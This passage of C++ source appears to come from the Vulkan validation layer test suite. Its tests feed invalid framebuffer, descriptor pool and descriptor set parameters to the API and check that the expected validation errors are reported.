"VUID-VkFramebufferCreateInfo-pAttachments-02633"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } 
vk::DestroyRenderPass(m_device->device(), rp_ds, NULL); // Create new renderpass with alternate attachment format from fb attach_desc.format = VK_FORMAT_R8G8B8A8_UNORM; subpass.pDepthStencilAttachment = NULL; subpass.pColorAttachments = &attach; err = vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); ASSERT_VK_SUCCESS(err); // Cause error due to mis-matched formats between rp & fb // rp attachment 0 now has RGBA8 but corresponding fb attach is BGRA8 fb_info.renderPass = rp; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-00880"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyRenderPass(m_device->device(), rp, NULL); // Create new renderpass with alternate sample count from fb attach_desc.format = VK_FORMAT_B8G8R8A8_UNORM; attach_desc.samples = VK_SAMPLE_COUNT_4_BIT; err = vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); ASSERT_VK_SUCCESS(err); // Cause error due to mis-matched sample count between rp & fb fb_info.renderPass = rp; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-00881"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyRenderPass(m_device->device(), rp, NULL); { // Create an image with 2 mip levels. VkImageObj image(m_device); image.Init(128, 128, 2, VK_FORMAT_B8G8R8A8_UNORM, VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image.initialized()); // Create a image view with two mip levels. VkImageView view; VkImageViewCreateInfo ivci = {}; ivci.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; ivci.image = image.handle(); ivci.viewType = VK_IMAGE_VIEW_TYPE_2D; ivci.format = VK_FORMAT_B8G8R8A8_UNORM; ivci.subresourceRange.layerCount = 1; ivci.subresourceRange.baseMipLevel = 0; // Set level count to 2 (only 1 is allowed for FB attachment) ivci.subresourceRange.levelCount = 2; ivci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; err = vk::CreateImageView(m_device->device(), &ivci, NULL, &view); ASSERT_VK_SUCCESS(err); // Re-create renderpass to have matching sample count attach_desc.samples = VK_SAMPLE_COUNT_1_BIT; err = vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); ASSERT_VK_SUCCESS(err); fb_info.renderPass = rp; fb_info.pAttachments = &view; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-00883"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyImageView(m_device->device(), view, NULL); } // Update view to original color buffer and grow FB dimensions too big fb_info.pAttachments = ivs; fb_info.height = 1024; fb_info.width = 1024; fb_info.layers = 2; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-00882"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } { if (!push_fragment_density_support) { printf("%s VK_EXT_fragment_density_map Extension not supported, skipping tests\n", kSkipPrefix); } else { uint32_t attachment_width = 512; uint32_t 
attachment_height = 512; VkFormat attachment_format = VK_FORMAT_R8G8_UNORM; uint32_t frame_width = 512; uint32_t frame_height = 512; // Create a renderPass with a single color attachment for fragment density map VkAttachmentReference attach_fragment_density_map = {}; attach_fragment_density_map.layout = VK_IMAGE_LAYOUT_GENERAL; VkSubpassDescription subpass_fragment_density_map = {}; subpass_fragment_density_map.pColorAttachments = &attach_fragment_density_map; VkRenderPassCreateInfo rpci_fragment_density_map = {}; rpci_fragment_density_map.subpassCount = 1; rpci_fragment_density_map.pSubpasses = &subpass_fragment_density_map; rpci_fragment_density_map.attachmentCount = 1; VkAttachmentDescription attach_desc_fragment_density_map = {}; attach_desc_fragment_density_map.format = attachment_format; attach_desc_fragment_density_map.samples = VK_SAMPLE_COUNT_1_BIT; attach_desc_fragment_density_map.finalLayout = VK_IMAGE_LAYOUT_FRAGMENT_DENSITY_MAP_OPTIMAL_EXT; rpci_fragment_density_map.pAttachments = &attach_desc_fragment_density_map; rpci_fragment_density_map.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO; VkRenderPass rp_fragment_density_map; err = vk::CreateRenderPass(m_device->device(), &rpci_fragment_density_map, NULL, &rp_fragment_density_map); ASSERT_VK_SUCCESS(err); // Create view attachment VkImageView view_fragment_density_map; VkImageViewCreateInfo ivci = {}; ivci.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; ivci.viewType = VK_IMAGE_VIEW_TYPE_2D; ivci.format = attachment_format; ivci.flags = 0; ivci.subresourceRange.layerCount = 1; ivci.subresourceRange.baseMipLevel = 0; ivci.subresourceRange.levelCount = 1; ivci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; VkFramebufferAttachmentImageInfoKHR fb_fdm = {}; fb_fdm.sType = VK_STRUCTURE_TYPE_FRAMEBUFFER_ATTACHMENT_IMAGE_INFO_KHR; fb_fdm.usage = VK_IMAGE_USAGE_FRAGMENT_DENSITY_MAP_BIT_EXT; fb_fdm.width = frame_width; fb_fdm.height = frame_height; fb_fdm.layerCount = 1; fb_fdm.viewFormatCount = 1; fb_fdm.pViewFormats = &attachment_format; VkFramebufferAttachmentsCreateInfoKHR fb_aci_fdm = {}; fb_aci_fdm.sType = VK_STRUCTURE_TYPE_FRAMEBUFFER_ATTACHMENTS_CREATE_INFO_KHR; fb_aci_fdm.attachmentImageInfoCount = 1; fb_aci_fdm.pAttachmentImageInfos = &fb_fdm; VkFramebufferCreateInfo fbci = {}; fbci.sType = VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO; fbci.pNext = &fb_aci_fdm; fbci.flags = 0; fbci.width = frame_width; fbci.height = frame_height; fbci.layers = 1; fbci.renderPass = rp_fragment_density_map; fbci.attachmentCount = 1; fbci.pAttachments = &view_fragment_density_map; // Set small width VkImageObj image2(m_device); image2.Init(16, attachment_height, 1, attachment_format, VK_IMAGE_USAGE_FRAGMENT_DENSITY_MAP_BIT_EXT, VK_IMAGE_TILING_LINEAR, 0); ASSERT_TRUE(image2.initialized()); ivci.image = image2.handle(); err = vk::CreateImageView(m_device->device(), &ivci, NULL, &view_fragment_density_map); ASSERT_VK_SUCCESS(err); fbci.pAttachments = &view_fragment_density_map; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-02555"); err = vk::CreateFramebuffer(device(), &fbci, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyImageView(m_device->device(), view_fragment_density_map, NULL); // Set small height VkImageObj image3(m_device); image3.Init(attachment_width, 16, 1, attachment_format, VK_IMAGE_USAGE_FRAGMENT_DENSITY_MAP_BIT_EXT, VK_IMAGE_TILING_LINEAR, 0); 
ASSERT_TRUE(image3.initialized()); ivci.image = image3.handle(); err = vk::CreateImageView(m_device->device(), &ivci, NULL, &view_fragment_density_map); ASSERT_VK_SUCCESS(err); fbci.pAttachments = &view_fragment_density_map; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-02556"); err = vk::CreateFramebuffer(device(), &fbci, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyImageView(m_device->device(), view_fragment_density_map, NULL); vk::DestroyRenderPass(m_device->device(), rp_fragment_density_map, NULL); } } { // Create an image with one mip level. VkImageObj image(m_device); image.Init(128, 128, 1, VK_FORMAT_B8G8R8A8_UNORM, VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image.initialized()); // Create view attachment with non-identity swizzle VkImageView view; VkImageViewCreateInfo ivci = {}; ivci.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; ivci.image = image.handle(); ivci.viewType = VK_IMAGE_VIEW_TYPE_2D; ivci.format = VK_FORMAT_B8G8R8A8_UNORM; ivci.subresourceRange.layerCount = 1; ivci.subresourceRange.baseMipLevel = 0; ivci.subresourceRange.levelCount = 1; ivci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; ivci.components.r = VK_COMPONENT_SWIZZLE_G; ivci.components.g = VK_COMPONENT_SWIZZLE_R; ivci.components.b = VK_COMPONENT_SWIZZLE_A; ivci.components.a = VK_COMPONENT_SWIZZLE_B; err = vk::CreateImageView(m_device->device(), &ivci, NULL, &view); ASSERT_VK_SUCCESS(err); fb_info.pAttachments = &view; fb_info.height = 100; fb_info.width = 100; fb_info.layers = 1; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-00884"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyImageView(m_device->device(), view, NULL); } { if (!multiviewSupported) { printf("%s VK_KHR_Multiview Extension not supported, skipping tests\n", kSkipPrefix); } else { // Test multiview renderpass with more than 1 layer uint32_t viewMasks[] = {0x3u}; VkRenderPassMultiviewCreateInfo rpmvci = { VK_STRUCTURE_TYPE_RENDER_PASS_MULTIVIEW_CREATE_INFO, nullptr, 1, viewMasks, 0, nullptr, 0, nullptr}; VkRenderPassCreateInfo rpci_mv = { VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, &rpmvci, 0, 0, nullptr, 1, &subpass, 0, nullptr}; VkRenderPass rp_mv; err = vk::CreateRenderPass(m_device->device(), &rpci_mv, NULL, &rp_mv); ASSERT_VK_SUCCESS(err); VkFramebufferCreateInfo fb_info_mv = fb_info; fb_info_mv.layers = 2; fb_info_mv.attachmentCount = 0; fb_info_mv.renderPass = rp_mv; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-renderPass-02531"); err = vk::CreateFramebuffer(device(), &fb_info_mv, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyRenderPass(m_device->device(), rp_mv, NULL); } } // reset attachment to color attachment fb_info.pAttachments = ivs; // Request fb that exceeds max width fb_info.width = m_device->props.limits.maxFramebufferWidth + 1; fb_info.height = 100; fb_info.layers = 1; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-width-00886"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, 
"VUID-VkFramebufferCreateInfo-pAttachments-00882"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } // and width=0 fb_info.width = 0; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-width-00885"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } // Request fb that exceeds max height fb_info.width = 100; fb_info.height = m_device->props.limits.maxFramebufferHeight + 1; fb_info.layers = 1; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-height-00888"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-00882"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } // and height=0 fb_info.height = 0; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-height-00887"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } // Request fb that exceeds max layers fb_info.width = 100; fb_info.height = 100; fb_info.layers = m_device->props.limits.maxFramebufferLayers + 1; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-layers-00890"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-00882"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } // and layers=0 fb_info.layers = 0; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-layers-00889"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } // Try to create with pAttachments = NULL fb_info.layers = 1; fb_info.pAttachments = NULL; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID_Undefined"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyRenderPass(m_device->device(), rp, NULL); } TEST_F(VkLayerTest, AllocDescriptorFromEmptyPool) { TEST_DESCRIPTION("Attempt to allocate more sets and descriptors than descriptor pool has available."); VkResult err; ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // This test is valid for Vulkan 1.0 only -- skip if device has an API version greater than 1.0. 
if (m_device->props.apiVersion >= VK_API_VERSION_1_1) { printf("%s Device has apiVersion greater than 1.0 -- skipping Descriptor Set checks.\n", kSkipPrefix); return; } // Create Pool w/ 1 Sampler descriptor, but try to alloc Uniform Buffer // descriptor from it VkDescriptorPoolSize ds_type_count = {}; ds_type_count.type = VK_DESCRIPTOR_TYPE_SAMPLER; ds_type_count.descriptorCount = 2; VkDescriptorPoolCreateInfo ds_pool_ci = {}; ds_pool_ci.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_POOL_CREATE_INFO; ds_pool_ci.pNext = NULL; ds_pool_ci.flags = 0; ds_pool_ci.maxSets = 1; ds_pool_ci.poolSizeCount = 1; ds_pool_ci.pPoolSizes = &ds_type_count; VkDescriptorPool ds_pool; err = vk::CreateDescriptorPool(m_device->device(), &ds_pool_ci, NULL, &ds_pool); ASSERT_VK_SUCCESS(err); VkDescriptorSetLayoutBinding dsl_binding_samp = {}; dsl_binding_samp.binding = 0; dsl_binding_samp.descriptorType = VK_DESCRIPTOR_TYPE_SAMPLER; dsl_binding_samp.descriptorCount = 1; dsl_binding_samp.stageFlags = VK_SHADER_STAGE_ALL; dsl_binding_samp.pImmutableSamplers = NULL; const VkDescriptorSetLayoutObj ds_layout_samp(m_device, {dsl_binding_samp}); // Try to allocate 2 sets when pool only has 1 set VkDescriptorSet descriptor_sets[2]; VkDescriptorSetLayout set_layouts[2] = {ds_layout_samp.handle(), ds_layout_samp.handle()}; VkDescriptorSetAllocateInfo alloc_info = {}; alloc_info.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_ALLOCATE_INFO; alloc_info.descriptorSetCount = 2; alloc_info.descriptorPool = ds_pool; alloc_info.pSetLayouts = set_layouts; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetAllocateInfo-descriptorSetCount-00306"); err = vk::AllocateDescriptorSets(m_device->device(), &alloc_info, descriptor_sets); m_errorMonitor->VerifyFound(); alloc_info.descriptorSetCount = 1; // Create layout w/ descriptor type not available in pool VkDescriptorSetLayoutBinding dsl_binding = {}; dsl_binding.binding = 0; dsl_binding.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; dsl_binding.descriptorCount = 1; dsl_binding.stageFlags = VK_SHADER_STAGE_ALL; dsl_binding.pImmutableSamplers = NULL; const VkDescriptorSetLayoutObj ds_layout_ub(m_device, {dsl_binding}); VkDescriptorSet descriptor_set; alloc_info.descriptorSetCount = 1; alloc_info.pSetLayouts = &ds_layout_ub.handle(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetAllocateInfo-descriptorPool-00307"); err = vk::AllocateDescriptorSets(m_device->device(), &alloc_info, &descriptor_set); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorPool(m_device->device(), ds_pool, NULL); } TEST_F(VkLayerTest, FreeDescriptorFromOneShotPool) { VkResult err; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkFreeDescriptorSets-descriptorPool-00312"); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); VkDescriptorPoolSize ds_type_count = {}; ds_type_count.type = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; ds_type_count.descriptorCount = 1; VkDescriptorPoolCreateInfo ds_pool_ci = {}; ds_pool_ci.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_POOL_CREATE_INFO; ds_pool_ci.pNext = NULL; ds_pool_ci.maxSets = 1; ds_pool_ci.poolSizeCount = 1; ds_pool_ci.flags = 0; // Not specifying VK_DESCRIPTOR_POOL_CREATE_FREE_DESCRIPTOR_SET_BIT means // app can only call vk::ResetDescriptorPool on this pool.; ds_pool_ci.pPoolSizes = &ds_type_count; VkDescriptorPool ds_pool; err = vk::CreateDescriptorPool(m_device->device(), &ds_pool_ci, NULL, &ds_pool); ASSERT_VK_SUCCESS(err); VkDescriptorSetLayoutBinding 
dsl_binding = {}; dsl_binding.binding = 0; dsl_binding.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; dsl_binding.descriptorCount = 1; dsl_binding.stageFlags = VK_SHADER_STAGE_ALL; dsl_binding.pImmutableSamplers = NULL; const VkDescriptorSetLayoutObj ds_layout(m_device, {dsl_binding}); VkDescriptorSet descriptorSet; VkDescriptorSetAllocateInfo alloc_info = {}; alloc_info.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_ALLOCATE_INFO; alloc_info.descriptorSetCount = 1; alloc_info.descriptorPool = ds_pool; alloc_info.pSetLayouts = &ds_layout.handle(); err = vk::AllocateDescriptorSets(m_device->device(), &alloc_info, &descriptorSet); ASSERT_VK_SUCCESS(err); err = vk::FreeDescriptorSets(m_device->device(), ds_pool, 1, &descriptorSet); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorPool(m_device->device(), ds_pool, NULL); } TEST_F(VkLayerTest, InvalidDescriptorPool) { // Attempt to clear Descriptor Pool with bad object. // ObjectTracker should catch this. ASSERT_NO_FATAL_FAILURE(Init()); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkResetDescriptorPool-descriptorPool-parameter"); uint64_t fake_pool_handle = 0xbaad6001; VkDescriptorPool bad_pool = reinterpret_cast<VkDescriptorPool &>(fake_pool_handle); vk::ResetDescriptorPool(device(), bad_pool, 0); m_errorMonitor->VerifyFound(); } TEST_F(VkLayerTest, InvalidDescriptorSet) { // Attempt to bind an invalid Descriptor Set to a valid Command Buffer // ObjectTracker should catch this. // Create a valid cmd buffer // call vk::CmdBindDescriptorSets w/ false Descriptor Set uint64_t fake_set_handle = 0xbaad6001; VkDescriptorSet bad_set = reinterpret_cast<VkDescriptorSet &>(fake_set_handle); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdBindDescriptorSets-pDescriptorSets-parameter"); ASSERT_NO_FATAL_FAILURE(Init()); VkDescriptorSetLayoutBinding layout_binding = {}; layout_binding.binding = 0; layout_binding.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; layout_binding.descriptorCount = 1; layout_binding.stageFlags = VK_SHADER_STAGE_VERTEX_BIT; layout_binding.pImmutableSamplers = NULL; const VkDescriptorSetLayoutObj descriptor_set_layout(m_device, {layout_binding}); const VkPipelineLayoutObj pipeline_layout(DeviceObj(), {&descriptor_set_layout}); m_commandBuffer->begin(); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &bad_set, 0, NULL); m_errorMonitor->VerifyFound(); m_commandBuffer->end(); } TEST_F(VkLayerTest, InvalidDescriptorSetLayout) { // Attempt to create a Pipeline Layout with an invalid Descriptor Set Layout. // ObjectTracker should catch this. uint64_t fake_layout_handle = 0xbaad6001; VkDescriptorSetLayout bad_layout = reinterpret_cast<VkDescriptorSetLayout &>(fake_layout_handle); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkPipelineLayoutCreateInfo-pSetLayouts-parameter"); ASSERT_NO_FATAL_FAILURE(Init()); VkPipelineLayout pipeline_layout; VkPipelineLayoutCreateInfo plci = {}; plci.sType = VK_STRUCTURE_TYPE_PIPELINE_LAYOUT_CREATE_INFO; plci.pNext = NULL; plci.setLayoutCount = 1; plci.pSetLayouts = &bad_layout; vk::CreatePipelineLayout(device(), &plci, NULL, &pipeline_layout); m_errorMonitor->VerifyFound(); } TEST_F(VkLayerTest, WriteDescriptorSetIntegrityCheck) { TEST_DESCRIPTION( "This test verifies some requirements of chapter 13.2.3 of the Vulkan Spec " "1) A uniform buffer update must have a valid buffer index. 
" "2) When using an array of descriptors in a single WriteDescriptor, the descriptor types and stageflags " "must all be the same. " "3) Immutable Sampler state must match across descriptors. " "4) That sampled image descriptors have required layouts. " "5) That it is prohibited to write to an immutable sampler. "); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-descriptorType-00324"); ASSERT_NO_FATAL_FAILURE(Init()); VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; VkResult err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); OneOffDescriptorSet::Bindings bindings = { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, NULL}, {1, VK_DESCRIPTOR_TYPE_SAMPLER, 1, VK_SHADER_STAGE_FRAGMENT_BIT, NULL}, {2, VK_DESCRIPTOR_TYPE_SAMPLER, 1, VK_SHADER_STAGE_FRAGMENT_BIT, static_cast<VkSampler *>(&sampler)}, {3, VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE, 1, VK_SHADER_STAGE_FRAGMENT_BIT, NULL}}; OneOffDescriptorSet descriptor_set(m_device, bindings); ASSERT_TRUE(descriptor_set.Initialized()); VkWriteDescriptorSet descriptor_write = {}; descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptor_set.set_; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; // 1) The uniform buffer is intentionally invalid here vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); // Create a buffer to update the descriptor with uint32_t qfi = 0; VkBufferCreateInfo buffCI = {}; buffCI.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; buffCI.size = 1024; buffCI.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT; buffCI.queueFamilyIndexCount = 1; buffCI.pQueueFamilyIndices = &qfi; VkBufferObj dynamic_uniform_buffer; dynamic_uniform_buffer.init(*m_device, buffCI); VkDescriptorBufferInfo buffInfo[2] = {}; buffInfo[0].buffer = dynamic_uniform_buffer.handle(); buffInfo[0].offset = 0; buffInfo[0].range = 1024; buffInfo[1].buffer = dynamic_uniform_buffer.handle(); buffInfo[1].offset = 0; buffInfo[1].range = 1024; descriptor_write.pBufferInfo = buffInfo; descriptor_write.descriptorCount = 2; // 2) The stateFlags don't match between the first and second descriptor m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-dstArrayElement-00321"); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); // 3) The second descriptor has a null_ptr pImmutableSamplers and the third descriptor contains an immutable sampler descriptor_write.dstBinding = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_SAMPLER; // Make pImageInfo index non-null to avoid complaints of it missing VkDescriptorImageInfo imageInfo = {}; imageInfo.imageLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; descriptor_write.pImageInfo = &imageInfo; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-dstArrayElement-00321"); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); // 4) That sampled image descriptors have required layouts -- create images to update the descriptor with VkImageObj image(m_device); const VkFormat tex_format = VK_FORMAT_B8G8R8A8_UNORM; image.Init(32, 32, 1, tex_format, VK_IMAGE_USAGE_SAMPLED_BIT, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image.initialized()); 
// Attmept write with incorrect layout for sampled descriptor imageInfo.sampler = VK_NULL_HANDLE; imageInfo.imageView = image.targetView(tex_format); imageInfo.imageLayout = VK_IMAGE_LAYOUT_UNDEFINED; descriptor_write.dstBinding = 3; descriptor_write.descriptorCount = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-descriptorType-01403"); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); // 5) Attempt to update an immutable sampler descriptor_write.dstBinding = 2; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_SAMPLER; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-descriptorType-02752"); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); vk::DestroySampler(m_device->device(), sampler, NULL); } TEST_F(VkLayerTest, WriteDescriptorSetConsecutiveUpdates) { TEST_DESCRIPTION( "Verifies that updates rolling over to next descriptor work correctly by destroying buffer from consecutive update known " "to be used in descriptor set and verifying that error is flagged."); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 2, VK_SHADER_STAGE_ALL, nullptr}, {1, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); uint32_t qfi = 0; VkBufferCreateInfo bci = {}; bci.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; bci.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT; bci.size = 2048; bci.queueFamilyIndexCount = 1; bci.pQueueFamilyIndices = &qfi; VkBufferObj buffer0; buffer0.init(*m_device, bci); CreatePipelineHelper pipe(*this); { // Scope 2nd buffer to cause early destruction VkBufferObj buffer1; bci.size = 1024; buffer1.init(*m_device, bci); VkDescriptorBufferInfo buffer_info[3] = {}; buffer_info[0].buffer = buffer0.handle(); buffer_info[0].offset = 0; buffer_info[0].range = 1024; buffer_info[1].buffer = buffer0.handle(); buffer_info[1].offset = 1024; buffer_info[1].range = 1024; buffer_info[2].buffer = buffer1.handle(); buffer_info[2].offset = 0; buffer_info[2].range = 1024; VkWriteDescriptorSet descriptor_write = {}; descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptor_set.set_; // descriptor_set; descriptor_write.dstBinding = 0; 